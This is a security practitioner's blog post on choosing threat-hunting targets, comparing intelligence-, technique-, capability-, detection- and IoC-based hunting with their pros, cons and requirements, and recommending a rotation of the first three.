So many SOCs I have seen are on a really low maturity level. On the other hand, having a SOC is not a new and fancy thing anymore so more and more companies start to have a really tuned and well-working security team now. As the security function matures in a company, they tend to invest in a Threat Hunting team. A team like this can be a big and sometimes even risky investment for a company. The success of a Threat Hunt team depends on a lot of different things: the tooling, other teams, and obviously how well the hunters work.
If the monitoring, detection engineering, automation engineering or threat intel team are not working properly then a Threat Hunt team is doomed to failure. These teams have to work closely together and they must be a fine-tuned engine. Frequently the TH (Threat Hunt) function provides input for these teams or uses their output, and without them, hunting will be heavily limited or even unuseful.
One big issue I have seen in the past in regards to Threat Hunting teams was that they did not know how to choose a proper target to hunt for. They used the same method repeatedly. With this action, they could cover some specific targets, but they repeated some of their steps constantly and they missed some low-hanging fruits which they could have found by using a different perspective. Also due to the lack of communication, the investigation of different teams had a big overlap which made all the teams less effective.
So, in this post, I want to show what mistakes I have seen in choosing of a threat hunt target, what are the benefits and drawbacks of the different approaches, and why you should utilize multiple one of these perspectives.
Normally when I start to work on a blog post there is a challenge behind it. Either I ran up against an obstacle I want to defeat, or somebody asks for my help in a security issue that seems interesting enough for me to be solved. Sometimes I am just curious how something works, and I couldn’t find the necessary sources on the internet, so after investigating it myself I also share it with you.
Here the initial trigger was a little bit different. I had an interview lately where I was asked how I would start with a threat hunt session, how I would choose my target, my goal. As I was explaining my ideas, I realized that even though I had read a lot about the topic I had never seen these things written down this way. So, I decided to collect my thoughts after the interview and write everything down here.
A lot of terminologies I used are like the ones in the Diamond-model, so I want to start with this one. First things first, even though I have seen the Diamond-model applied in threat hunting scenarios, it is not designed for this purpose. This model is designed for incident response and threat intel in mind and its goal is to conduct intelligence on the investigated intrusions.
(Image is linked from threatconnect.com. Find more info about the model on the site.)
The reason why I won’t use this model alone for threat hunt is that it only focuses on the actor. The Diamond-model helps you build a profile of a threat actor. By profiling somebody, you will collect the behavior of that actor, the techniques it uses, the well-known targets of the attacker, and the used infrastructure. All this information can be used to find malignant activity in the network, so it looks like a straightforward model to perform the hunt.
Well, it is. It is one good way to start a hunt, but not the only one. And maybe doing the hunt based on specific groups is the most heavily used method. However, it has its requirements and drawbacks too which should be addressed. There are other ways to define a threat hunt target. But everything depends on how your team works, whether it communicates with other teams or not, and what the actual goal of your threat hunting team is.
To find out which method is good for your team, you should know the goal of your threat hunt sessions. Finding an intrusion in your network is a good result, but if you don’t provide any other output, you don’t use your team in its full power. The Threat Hunt team is not simply less effective this way, but also some of your other teams have to do duplicated work because they must repeat the same investigation.
The output of a Threat Hunt:
An incident: This is the trivial output. When you start a threat hunt you assume that an infection is already in the network. You put yourself into the place of an attacker, guess what an attacker would do, how it would carry out the attack, and what kind of logs would be created by its actions. If you guessed correctly and performed your hunt just fine, you will find a (sign of an) infection which will be your incident. Frequently, a threat hunt is considered successful if you find an actual infection (I don’t think it is a good metric, but it is not the topic this time), but even if you don’t, there can be other outputs which are worth utilizing.
A detection logic: When a threat hunter tries to find an infection, they write a lot of queries, and at the end, with additional investigation, an incident will be found… or not. This or that way the created queries could be used as scheduled searches (detection rules) to alert if an attacker in the future tries to use the investigated technique. If no detection logic is created at the end, then the same threat hunt has to be done repeatedly by the hunting team to be sure nobody uses the given method ever. This is obviously not efficient, so providing the queries or involving the detection team can help in making the company more secure against future attacks. Not every threat hunt output can be used for detection, but even in that case, it can be a good start.
Increased visibility: A hunter will quickly realize if some logs which are needed for a specific hunt are missing from the network. This can be the end of the hunt with a report that says the investigation was not possible. But it can also be used to increase visibility. Sometimes the lack of events can only be solved by buying new appliances or solutions and it is not always financially possible. However, in other cases, the system is there and only the log collection has to be configured to forward the events into a SIEM or the logging should be changed on the system (for example from error to debug to get more logs). This output can help incident response or detection engineering teams too so finding blindspots is always a crucial step.
Better prevention: While it is not mostly in the toolkit of a threat hunter, but during an investigation, one can find solutions to prevent some actions to be executed. Defending the systems are better than just monitoring them to find the infections (after all, we are not the Avengers), so finding a way to prevent a malicious actor to do its job is always useful. Also, it depends on how the hunters work at a company, but they can also confirm the behavior of already existing preventative measures. If prevention is in place, maybe the threat hunt (and detection creation) is not even needed anymore.
Knowledge sharing: One of my favorite things I have seen in a threat hunting session was involving people from other teams. This is not simply good for team-building purposes, but it can also help people to learn new things. Also, when I was working as an incident responder sometimes the job became a little mundane; and participating in a Threat Hunt on a rotation basis could shake me up and give me new energy.
The more way the output of a threat hunt session can be used, the more effective the whole security team is going to be.
What to hunt for
Defining what to hunt for in a network is a crucial step. If you ill-define the target, you can put a lot of effort into something non-lucrative. You can hunt for days without finding anything simply because of a mistake at the beginning. Even finding something can be bad, if you could have generated more or better outputs with a better target. You must always consider the potential value of the output and the effort you put into the hunt before you commit to a prey. (This evaluation is frequently done by other teams, like threat intelligence team.)
In my “model” I have defined 5 different inputs which could trigger a threat hunt. These are the input you could potentially use to choose the targets and build-up your hypothesizes. From this list, I only consider 3 (maybe 4) as real threat hunt sources. The remaining two depend on how your team works. Normally those methods are not used by threat hunters, but again, it depends. So read my explanation later.
Source of the TH:
Intelligence: Having intelligence information about a malware or a threat actor group can trigger an investigation to find a possible intrusion. Most of the time it relies on a good threat intelligence team.
Techniques: Focusing on a specific technique, covering a newly found LOLBin, hunting for internally developed tool misuses, and insider threats.
Capability: The focus is on a log source, or maybe a specific field in an event and not on techniques or attackers. For example, covering methods related to DNS logs.
Detection: Start a hunt based on an already detected activity. Malware is triggered on a machine, but you are afraid it can be there on any system without the same logging/detection. Similar activities can be handled by an IR team, Threat Hunt involvement is not always necessary. Thus, I will only consider it a Threat Hunt input in specific situations.
Infrastructure: This is what I like to call IoC hunting. I have seen a lot of TH team looks for IPs, URLs in the network from time to time, but this is really not efficient. If your team does this, instead of handling these IoCs automatically, you are on maturity level 0 or 1 and you shouldn’t do threat hunt yet. Still, a lot of teams do this, so I kept it on the list.
Any of them can be an initial input for your threat hunt. But it will also frequently happen that one of them initiates another one. For example, you can start your threat hunt with an intelligence of a threat actor (method 1). However, a report like this often contains IoCs which then you can use for IoC hunting (method 5).
This is possibly the most well-known and most heavily used way to define a target. You have information about a malware, or a threat hunting group and you assume they are in your network. You want to find them, so you carry out a threat hunting session. This is intelligence-based because the information you have to use frequently comes from the threat intelligence team (and well, it is based on intelligence). Also, the success of your hunt heavily depends on the intelligence you get. You can find articles on the internet yourself, but a lot of these articles are not really useful, sometimes had to be translated into a technical language and can be also very limited.
And here is where the TI (Threat Intelligence) team comes into play. A threat intel team has better sources, they have access to information a normal person has not. A good source is really important for threat hunt. They can also choose the best reports which can be used for hunting. Saying a malicious actor uses registry for permanency is a piece of information hard to act on because there are a lot of different ways and registry keys that can be used to achieve permanency. Hunting for all of the ways it can be done is tedious, not actor/threat-focused, and therefore less valuable. On the other hand, providing specific registry-keys that are used, or the tool which is used to modify the registry is a good source and a report with this information is actually usable.
It is also the TI’s job to know which actors are possibly going to attack your company. If you are a healthcare institution and a group only attacks military targets, then looking for this group in your network is a waste of time. It is the responsibility of TI to find the proper actors or threats, provide you the necessary intelligence, and translate this information to a technical and usable report.
- You need a good TI team with proper sources.
- Information should exist about a specific group or threat.
- Good and detailed intelligence information is needed.
When to use:
- You want quick results, or you want to prove the validity of your TH team.
- You want to focus on targeted threats against your company. (A lot of infections are not targeted though).
- Your team works alone and doesn’t cooperate with other teams, noone is involved from other teams at all. (Not a problem if they are involved, but this is the best method if they do not.)
- It has the biggest chance to find something, considering you hunt for targets that are in your network with the highest probability.
- Can take up a really long time, because a group can use a huge amount of different tools and techniques.
- Big chance of repeated work. Two actors can use the same methods to perform some nasty action. Hunting for the two actors independently can cause the hunters to look for similar (or the same) activities twice. If the hunting is really specific, the hunters can miss a similar action, which they will only investigate when they are dealing with the other group.
- Hunters are always behind the attackers. An attacker can find a method, use it, then be investigated by somebody and this information has to be shared before the TH team can start the hunt.
- Findigs are often not future-proof, and only valuable if it is executed in a given timewindow. (When the malware is active, or the given methods are used by the actor.)
Technique-based hunting focuses only on a few specific techniques in a session. In this terminology, a technique can be a TTP an attacker uses, a specific tool on the system, or way a tool can be abused by an attacker. The general benefit of this perspective is that often you don’t need any threat intel that’s hard to come by, and you can also focus on solutions that are only available at your company so finding public information is unlikely in regards to those solutions.
There are multiple ways you can utilize this perspective; it depends on what you want to hunt for:
a) Internally developed tools / solutions
Some of the internally developed tools can be abused either by an external attacker (in this case the attacker has to know a great deal about your company) or by an internal user who just tries to make his/her life easier.
Example 1: At one of the companies I know, users couldn’t install their own tools on their system. To install a software, they could either use a Software Manager that contained the pre-approved tools, or they could ask the IT team to assess and approve a tool. But developers asked for new tools way too frequently so the company provided them the right to approve their own tool. The tooling on the machines became chaotic after this and one of the tools was used as C2 channel later on. This thing was actually detected by an anomaly detection rule, not by a threat hunt activity. A few users installed a significantly high amount of non-preapproved tools on their machines. The amount was so high that it reached the threshold of the rule.
Example 2: At another company, users could ask admin access for a limited period of time via an internally developed tool. The admin access had to be approved by somebody first. However, due to a bug in the tool, one could get admin access without approval for an infinite amount of time. When the bug was reported by the red team, a threat hunt was executed and many systems were recognized on which the users got permanent admin access. On some of the systems this happened without the knowledge of the user who accidentally requested the permanent admin rigths via the bug.
b) Insider threat
Even though I call it insider threat, these are often not really attacks against a company but rather a user or an admin, wants to make his/her job more convenient by bypassing some of the policies or security solutions. Administrators, developers are typically familiar with the environment they are working in. They are also people who like to solve their problems quickly and effectively.
Because of this, they tend to use non-approved methods, or bypass solutions to make their job easier. One thing I frequently see is developers (who are admins on their machines) are disabling VPNs/proxies on their machines so they can download a new tool for their job. During this time the visibility on their machine is not complete so sometimes it can be hard to find these actions.
When the visibility has decreased, the user or even an attacker on the machine can perform a lot of actions that otherwise would be impossible. This can be a downloaded malicious file that otherwise would be blocked by the proxy, or data exfiltration that normally would be detected by rules based on the proxy logs.
c) Newly published techniques
A lot of new techniques are published constantly on the internet which could be used to execute some malicious actions. While sometimes these are threat/threat actor related, in other cases these new methods are discovered by blue teamers, so somebody can read about them and prepare protection before they are actively used in the wild.
Most of the time this information is available on public forums, and anybody who is interested in security can access this data. This means any threat hunter can get this information without having a TI team in place.
Example: A new LOLBin has been discovered recently. If you use Microsoft Defender ATP, there is a chance you have the affected version of MpCmdRun.exe on your machine. With this LOLBin you can download a file from the internet, which could be used by an attacker to download a malicious code. When it was found there was no information about any attacker who would have used it already. You could execute a threat hunt to be sure nobody really used it in your network. As an additional output you could create a detection too, so in the future you wouldn’t have to be afraid of somebody using it unnoticed.
When to use it:
- You want to cover internally developed tools or misuse of your internal network.
- You want to cover techniques as soon as they are discovered.
- You want to provide detection as an output too.
- You can cover internal things too, which are frequently not detailed (or are not there at all) in public reports.
- You can cover a technique/tool before it is heavily abused by malwares.
- You don’t need a threat intel team (this is a big benefit because a lot of companies don’t have a good threat intel team in place.)
- Low chance of finding an actual intrusion from external sources. Most frequently you will find internal misuse.
- Sometimes the internal part of this method is not TH responsibility.
- The reports of the new techniques can be vague, so a hunt will require you to put a lot of time into finding out how the method works.
When you hunt, you normally start with thinking what an attacker would do, and then you can look around in the network. Another approach is to see what you are able to detect in the network, what logs you have, and then think about how you can detect an infection in your network with the given visibility. This is capability-based hunting.
This or that way you will find out what you can see and you have to come up with hypotheses, but the order is different based on what method you use. Let’s say you want to cover proxy-based techniques. In this case, you pick the proxy events, and you create multiple ideas about how a possible attacker could be detected by those events. There can be an infinite amount of different ideas, so most of the time you won’t be able to cover everything.
When you do an Intel-based threat hunt there is a chance that you are going to cover some specific log sources over and over again (but this doesn’t mean overlapping hunts). One of the actors can be detected by some odd User agent, the other one uses a pattern in the URL, but all of the info can be found in proxy logs. Instead of this approach, you can just choose the given log source and you can try to cover a lot of different techniques. This is also a good method if you want to use anomaly-based hunting, finding a user with a huge amount of GET requests, or some rare user agents in the network.
Anomaly-based hunting can also help you find undiscovered techniques and unreported IoCs. A simply example is when a lot of systems start to communicate with a yet unseen URL. Maybe the traffic is even beaconing-like. If the URL is not a malicious one, and no detection has triggered on the machines then a threat hunter can take a deeper look and find someting maybe yet uncovered. (Obviously some information, or knowledge is still needed, because the anomaly detection query must be created to cover a possible technique and not just to randomly do something). In case of Capability-based hunting you can focus on something out-of-place, out-of-ordinary and you can investigate whether it is an attack technique or not. (It it similar to the Machine Learning-based (ML) hunting I’m going to explain in the next section. Actually a lot of ML-models are just fancy anomaly-detector engines.)
Also, this can be the way if one of your important output is some detection logic. When a new event type (e.g proxy logs) are forwarded to a SIEM the first time, you won’t have any detections in place and no threat hunt was carried out yet based on those logs. In this case, it can be a gold mine. You can detect a lot of new infections that weren’t possible with the previously existing logs. You can also create a lot of detection logic as an output. If the log source is new, there is a chance you have to wait a little bit first to collect enough data for threat hunt and to see how your network works in regards to the given source.
There are some specific log sources that are frequently used by hunters with great success. These logs can be used to detect actions that are frequently utilized by attackers, so some specific logs can be a gold mines in themselves, even when they are not new. For example, the most used Initial Access method is phishing. I think there is no company without any fishing attempts in its network. Having e-mail logs can be used by a threat hunter to find these phishing attempts, and even though a phishing mail won’t always result in an incident, they can be a really good source of intel.
When to use it:
- Your TH team works in close relation with the Detection Engineering team.
- When a new log source is introduced in the network (or in the SIEM).
- When you want to learn about a specific log source or events in the network (because for example every log source should have a SME (Subject Matter Expert) in the team, or you want to find issues with the logging, etc.)
- If a threat intel team is not available.
- A new log source can unfold infections that weren’t possible to be detected earlier.
- You can find completely undocumented methods.
- A good approach to create new detections. If the detection logic is an important output for your threat hunt team, this is the method with the highest value.
- No threat intel team is needed.
- Can be slow or incomplete, because a lot of techniques can be covered in regards to one log source.
- Hard to measure. A threat intel team can give you ideas what to cover in case of a specific log source.
- There is a chance you will cover techniques which are not heavily used recently, so your outputs won’t be overly valuable.
- With a new logsource, sometimes you have to wait weeks to collect enough data to perform a useful threat hunt.
You can carry out a threat hunt based on what you have already seen in the network before your threat hunt. This trigger can be an alert that was detected on a machine, but after further investigation, you have the suspicion that other systems can be infected too. Or it can be a wide-spread infection in the network that you want to track down. In this case, some part of this infection is investigated already, but other steps of the attack are unknown and you want to unveil these aspects too.
As I have already expressed, I do not specifically think that this should be part of the threat hunt (for the umpteenth time, this depends on your setup, how your team works). The reasons are the following:
When you threat hunt, you have to assume the attacker is in the network, but that is all. You have an assumption, but no knowledge. In my opinion threat hunt is finding a yet unknown infection, and in a situation like this the infection is not unknown, only some of its aspects are undiscovered.
When the investigation is related to an incident, it should be solved by a security analyst/incident responder. They are working with the detections; threat hunters deal with the non-detected intruders. Thus, I simply think this is normally not a threat hunt responsibility.
However, positions are frequently vaguer, and the responsibilities are not clarified. Also, teams tend to be kind of understaffed, so in case of a big investigation, a lot of people from other groups are involved too. But even if TH members are involved in these investigations, I don’t think it is really TH responsibility, or that this should be a relevant trigger for them.
On the other hand, I think there is a good source that can be used under the Detection-based method. More and more teams start to utilize machine learning models to detect malicious activity. Based on my experience though, these models trigger way too many false-positives. So, creating incidents for every alert created by an ML model seems way too FP-prone today. On the other hand, these ML alerts could be used as sources for threat hunt. A model like this can trigger on an activity that abuses a still uses a still unknown technique for example. Part of this can still be considered incident response responsibility, but it is potentially a really rich source too.
Machine Learning model: Using these ML alerts can still be considered Detection-based TH. The action was automatically detected by a “rule”, the difference is that these rules are less reliable nowadays then normal detection logics, so it is rather a guided threat hunt instead of incident response. On the other hand ML-models are based on the events in the network, so it can be considered Capability-based hunting. The decision to consider it Detection-based or Capability-based is hard. It depends on your model, on the reliability of your model and on the ownership of the trigged ML-based alerts. If it is just an anomaly detection rule, then we can say it is capability-based. If it has other information, like how an attacker acts in the network, then we can say it is Detection-based (in this case it does not just rely on internal capabilities). If the IR team deals with it exclusively then it is not even TH input for you anymore.
This or that way, the output of an ML-model can be a good source for threat hunt, so consider using it if you have it.
Because it can have some relevant scenarios when involving hunters in these investigations are actually reasonable (e.g ML-based), I’m still going to consider this as threat hunt. But please, do not force your threat hunters to participate in every investigation and in all of the incident response activities.
- You need some kind of detection in place.
- For ML-based hunt you need a good Machine Learning model implemented and fine-tuned.
When to use it:
- If you have a good ML model already in place.
- If you have to be involved in the unknown aspects of an investigation.
- When the teams are understaffed.
- Only has benefits if you use a ML model. In this case, you have a new type of source which is still rarely used nowadays.
- A good ML model can help you find unknown infections.
- Should be done by IR teams, so you take the resource from a normal threat hunt session.
- A bad ML model will slow you down and make you do unuseful investigations and hunts.
By infrastructure-based threat hunt I mean looking for basic IoCs. By basic IoC I mean anything that is easy to search in a SIEM, these are the lower steps in the Pyramid of Pain.
In these IoCs I include IPs, domains, e-mail addresses (which are similar to domains), hashes. Normally this information is easy to look for in the logs, they are not obfuscated in the events and they have a fixed place so with some basic rule you can cover them.
This is the lowest-level way to perform a threat hunt. I personally don’t even think it is threat hunt if you search these IoCs in your network. A good threat hunt session utilizes the skill and knowledge of the hunters. On the other hand, this method can be done by a robot. This is something that should be automated as soon as possible instead of doing it manually. Also, it is easy to automate, so it shouldn’t be a problem.
You need a platform, or sometimes only some lookup tables that you can use to store the IoCs. After that, you need some basic rules that can check the pre-defined logs whether they contain any information from these lookup tables. These rules can simply be configured to do historical correlation too, instead of just alerting on future data. The only manual task here should be the IoC extraction from reports (by threat intel team, but sometimes this can be automated too).
According to the Sqrrl’s Threat Hunt maturity model a team is on level 0 if they don’t do any threat hunt, they solely focus on incident resolution. Level 1 means they do the above-mentioned Infrastructure-based hunt; however, I still think this is not threat hunt, only a waste of time. This type of hunt should never be done manually.
These IoCs are specific to a malware or a group. They are potentially used for a limited amount of time but then they can become benign. For this limited amount of time, you have to execute the hunt over and over again. It just makes sense to create a detection instead of doing the hunt repeatedly. And in this case, you can just start with it instead of doing the hunt. If your framework is there, you can just fill it up with IoC data constantly and maybe automatically.
If you have hunting queries like this and you create new ones which are similar, then be ashamed
(Splunk terminology – the same applies if you created a nicer query but with the same purpose):
Index=proxy sourceip=IP1 OR sourceip=IP2 OR sourceip=IP3 OR sourceip=IP4 OR sourceip=IP5 OR sourceip=IP6 OR sourceip=IP7 ...
When to use it:
- If you do not have the necessary tools to automate it, but even then, rather focus on automating it first
- You can easily detect some well-known malwares and actors (but this is not a benefit over the other methods of Threat Hunt, because this is not Threat Hunt).
- The TH team will be busy with something that should be automated.
- Executing it once is not valuable. You can be infected tomorrow with the thing you investigated today without detecting it. This is less of an issue with other methods because a given technique can be used by a lot of malwares so there is a higher chance of finding something relevant. (Still, it is always a good idea to create a detection if possible.)
- Some IoCs can be noisy, it depends on your IoC feed. (For example, not every URL that has 1⁄60 classification on VirusTotal is immediatly malicious. If you use a feed that marks it malicious you can find way more incorrect “infections”.)
So, what to hunt for
I have described five different methods you can use to define your target. Which one to use should really depend on your capabilities and your teams. If you satisfy all the mentioned requirements and you have mature teams already, then you can focus on the first three solutions.
And from those three? Well, I wouldn’t choose just one. I think it’s best if you apply each one of them on a rotation basis. All of them have their benefits and there are situations in which they are effective to use. However, they all have their cons too, so sometimes you do not want to use them. You must adapt it to your current position.
For example, you can decide to use the Intelligence-based hunting most of the time, when you have the necessary intel. However, when a new log source is introduced or you realize that some of the logs weren’t covered during the last few hunting sessions, you can just pick that log source and you can focus on it for one hunt. Or you can do the intelligence-based but when a new technique is published on the internet, you can quickly organize a technique-based session to cover that method and then you can go back to intelligence-based hunting.
If your team does infrastructure-based hunting, try to automate it first. No reason to try to threat hunt without basic automations/detections in place. If you are done with this, you can rotate the other methods based on what you have in place and what is most beneficial in a certain situation. Also, from the remaining ones, try to focus on the Intelligence- / Technique- / Capability-based methods, and only do Detection-based if it is really necessary, or if you have implemented the above-mentioned ML-model already.
And as last words, here is the gist of the blog. Which threat hunt methods to use:
- Intelligence-based: Yes, do it.
- Technique-based: Yes, do it.
- Capability-based: Yes, do it.
- Detection-based: Meh. Maybe if it is ML-based, even then it depends.
- Infrastructure-based: No.
Have a nice hunt.